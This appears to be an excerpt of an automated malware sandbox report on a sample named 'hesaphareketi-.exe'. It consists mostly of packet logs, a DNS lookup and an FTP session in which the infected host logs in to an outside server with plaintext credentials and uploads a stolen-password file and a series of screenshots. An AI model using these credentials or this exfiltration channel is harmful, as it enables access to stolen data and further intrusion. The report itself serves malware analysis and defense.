                                          Jun 27, 2024 09:22:11.222610950 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222621918 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222714901 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222770929 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222842932 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222852945 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.222903013 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.227576017 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.228089094 CEST6255949721104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.230402946 CEST4972162559192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.351620913 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:11.702671051 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:11.853859901 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:14.604408979 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:22:14.609625101 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:14.821157932 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:22:59.791075945 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:08.469485998 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:08.475227118 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:08.684155941 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:08.709219933 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:08.714229107 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:08.714339018 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:08.714421988 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:08.719988108 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.318080902 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.318511963 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.323577881 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323626041 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323636055 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323645115 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323653936 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323693037 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323702097 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323738098 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.323786974 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323796034 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323803902 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.323806047 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.323859930 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.328711987 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328762054 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328798056 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.328813076 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328830957 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328840017 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328841925 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.328890085 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.328905106 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.328964949 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.329161882 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.329411030 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.333903074 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.333913088 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334016085 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334026098 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334070921 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334167004 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334213018 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334280014 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334395885 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334404945 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334625959 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334634066 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334975004 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.334985018 CEST5108149728104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.335098982 CEST4972851081192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.398510933 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:09.778636932 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:09.898205042 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:14.605659962 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:14.610764980 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:14.971771002 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:14.972332001 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:14.977305889 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:14.977370977 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:14.977427006 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:14.982191086 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.587732077 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.588010073 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.592905998 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.592926979 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593028069 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593036890 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593041897 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.593045950 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593055964 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593070984 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593087912 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.593101978 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.593107939 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593123913 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593162060 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.593173981 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.593239069 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.593297005 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.597944975 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.597953081 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.597963095 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598047972 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598057032 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598067999 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598078012 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598154068 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598162889 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598191977 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.598195076 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598202944 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.598258018 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.598288059 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.605947018 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.605993032 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606060028 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606129885 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606237888 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606283903 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606364965 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606405973 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.606580019 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.607182026 CEST5218449729104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:15.607256889 CEST4972952184192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:15.788973093 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:16.054924011 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:16.101367950 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.974370003 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.979316950 CEST2149730104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:20.979377985 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.979593992 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.991204977 CEST2149730104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:20.991254091 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.470098019 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.475111008 CEST2149731104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:31.479216099 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.479429960 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.484684944 CEST2149731104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:31.485219002 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:47.451105118 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:47.456589937 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:47.456739902 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.114670992 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:48.115014076 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:48.115129948 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.118901014 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.123773098 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.113765001 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.118752956 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.118830919 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.756793022 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.756834984 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.757061005 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.762120962 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.766899109 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:57.529081106 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:57.540242910 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:57.540328979 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.168155909 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:58.168401957 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:58.168519020 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.168555021 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.173372984 CEST2149734104.247.165.99192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 27, 2024 09:19:52.621262074 CEST | 62136 | 53 | 192.168.2.7 | 1.1.1.1
Jun 27, 2024 09:19:52.667220116 CEST | 53 | 62136 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 27, 2024 09:19:52.621262074 CEST | 192.168.2.7 | 1.1.1.1 | 0xcfa7 | Standard query (0) | ftp.normagroup.com.tr | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 27, 2024 09:19:52.667220116 CEST | 1.1.1.1 | 192.168.2.7 | 0xcfa7 | No error (0) | ftp.normagroup.com.tr | | 104.247.165.99 | A (IP address) | IN (0x0001) | false

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jun 27, 2024 09:19:53.587408066 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 17 of 50 allowed.
    220-Local time is now 10:19. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Jun 27, 2024 09:19:53.587594032 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 17 of 50 allowed.
    220-Local time is now 10:19. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Jun 27, 2024 09:19:53.587610006 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | USER admin@normagroup.com.tr
Jun 27, 2024 09:19:53.808285952 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 331 User admin@normagroup.com.tr OK. Password required
Jun 27, 2024 09:19:53.808502913 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | PASS Qb.X[.j.Yfm[
Jun 27, 2024 09:19:54.050478935 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 230 OK. Current restricted directory is /
Jun 27, 2024 09:19:54.274281025 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 504 Unknown command
Jun 27, 2024 09:19:54.274454117 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | PWD
Jun 27, 2024 09:19:54.496164083 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 257 "/" is your current location
Jun 27, 2024 09:19:54.496341944 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | TYPE I
Jun 27, 2024 09:19:54.716557026 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 200 TYPE is now 8-bit binary
Jun 27, 2024 09:19:54.716708899 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:19:54.937917948 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,209,103)
Jun 27, 2024 09:19:54.944295883 CEST | 49703 | 21 | 192.168.2.7 | 104.247.165.99 | STOR PW_user-899552_2024_06_27_03_19_51.html
Jun 27, 2024 09:19:55.630709887 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:19:55.862613916 CEST | 21 | 49703 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.231 seconds (measured here), 1.36 Kbytes per second
Jun 27, 2024 09:21:50.755276918 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 22 of 50 allowed.
    220-Local time is now 10:21. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Jun 27, 2024 09:21:50.757167101 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | USER admin@normagroup.com.tr
Jun 27, 2024 09:21:50.971409082 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 331 User admin@normagroup.com.tr OK. Password required
Jun 27, 2024 09:21:50.978455067 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASS Qb.X[.j.Yfm[
Jun 27, 2024 09:21:51.241735935 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 230 OK. Current restricted directory is /
Jun 27, 2024 09:21:51.456182957 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 504 Unknown command
Jun 27, 2024 09:21:51.456425905 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PWD
Jun 27, 2024 09:21:51.671273947 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 257 "/" is your current location
Jun 27, 2024 09:21:51.671910048 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | TYPE I
Jun 27, 2024 09:21:51.885766983 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 200 TYPE is now 8-bit binary
Jun 27, 2024 09:21:51.886185884 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:21:52.100177050 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,237,62)
Jun 27, 2024 09:21:52.105901003 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_08_17_00_21_24.jpeg
Jun 27, 2024 09:21:52.719655037 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:21:53.177844048 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.458 seconds (measured here), 141.89 Kbytes per second
Jun 27, 2024 09:21:56.031335115 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:21:56.245140076 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,202,157)
Jun 27, 2024 09:21:56.251194000 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_08_21_16_53_11.jpeg
Jun 27, 2024 09:21:56.879386902 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:21:57.367839098 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.481 seconds (measured here), 134.94 Kbytes per second
Jun 27, 2024 09:21:59.199033976 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:21:59.413633108 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,211,152)
Jun 27, 2024 09:21:59.424755096 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_08_25_08_13_25.jpeg
Jun 27, 2024 09:22:00.055372000 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:00.408893108 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:00.547805071 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.492 seconds (measured here), 131.95 Kbytes per second
Jun 27, 2024 09:22:05.401655912 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:05.618824005 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,238,151)
Jun 27, 2024 09:22:05.624507904 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_08_30_05_46_44.jpeg
Jun 27, 2024 09:22:06.237168074 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:06.754448891 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.517 seconds (measured here), 134.77 Kbytes per second
Jun 27, 2024 09:22:07.090320110 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.517 seconds (measured here), 134.77 Kbytes per second
Jun 27, 2024 09:22:10.359616041 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:10.573729038 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,244,95)
Jun 27, 2024 09:22:10.579487085 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_09_03_12_15_41.jpeg
Jun 27, 2024 09:22:11.198812962 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:11.702671051 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.500 seconds (measured here), 129.90 Kbytes per second
Jun 27, 2024 09:22:14.604408979 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:14.821157932 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,245,232)
Jun 27, 2024 09:22:14.828476906 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_09_07_13_14_57.jpeg
Jun 27, 2024 09:22:15.441502094 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:15.922286987 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.483 seconds (measured here), 134.59 Kbytes per second
Jun 27, 2024 09:22:30.562160969 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:30.775743961 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,224,250)
Jun 27, 2024 09:22:30.781390905 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_09_16_17_15_39.jpeg
Jun 27, 2024 09:22:31.399080038 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:31.878870010 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.479 seconds (measured here), 135.49 Kbytes per second
Jun 27, 2024 09:22:38.261220932 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:38.581157923 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,193,57)
Jun 27, 2024 09:22:38.586810112 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | STOR SC_user-899552_2024_09_22_07_41_08.jpeg
Jun 27, 2024 09:22:39.213048935 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Jun 27, 2024 09:22:39.716248989 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
    226 0.503 seconds (measured here), 129.21 Kbytes per second
Jun 27, 2024 09:22:52.142447948 CEST | 49716 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Jun 27, 2024 09:22:52.357814074 CEST | 21 | 49716 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,209,32)
                                          Jun 27, 2024 09:22:52.363390923 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_04_21_17_28.jpeg
                                          Jun 27, 2024 09:22:52.971976995 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:53.457544088 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.485 seconds (measured here), 133.88 Kbytes per second
                                          Jun 27, 2024 09:22:53.683054924 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:53.897341967 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,1)
                                          Jun 27, 2024 09:22:53.902882099 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_07_17_30_54.jpeg
                                          Jun 27, 2024 09:22:54.535080910 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:55.049315929 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.515 seconds (measured here), 126.18 Kbytes per second
                                          Jun 27, 2024 09:22:58.125581980 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:58.420330048 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,228)
                                          Jun 27, 2024 09:22:58.428961039 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_11_20_59_48.jpeg
                                          Jun 27, 2024 09:22:59.059892893 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:59.567600012 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.508 seconds (measured here), 127.94 Kbytes per second
                                          Jun 27, 2024 09:23:08.469485998 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:23:08.684155941 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,199,137)
                                          Jun 27, 2024 09:23:08.714421988 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_19_06_44_12.jpeg
                                          Jun 27, 2024 09:23:09.318080902 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:23:09.778636932 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.461 seconds (measured here), 145.84 Kbytes per second
                                          Jun 27, 2024 09:23:14.605659962 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:23:14.971771002 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,216)
                                          Jun 27, 2024 09:23:14.977427006 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_24_04_03_45.jpeg
                                          Jun 27, 2024 09:23:15.587732077 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:23:16.054924011 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.466 seconds (measured here), 139.22 Kbytes per second
                                          Jun 27, 2024 09:23:48.114670992 CEST2149732104.247.165.99192.168.2.7421 Too many connections (8) from this IP
                                          Jun 27, 2024 09:23:53.756793022 CEST2149733104.247.165.99192.168.2.7421 Too many connections (8) from this IP
                                          Jun 27, 2024 09:23:58.168155909 CEST2149734104.247.165.99192.168.2.7421 Too many connections (8) from this IP

                                          Target ID:0
                                          Start time:03:19:48
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x220000
                                          File size:661'504 bytes
                                          MD5 hash:C96C8178B1018515D4B43E614A3E3F15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
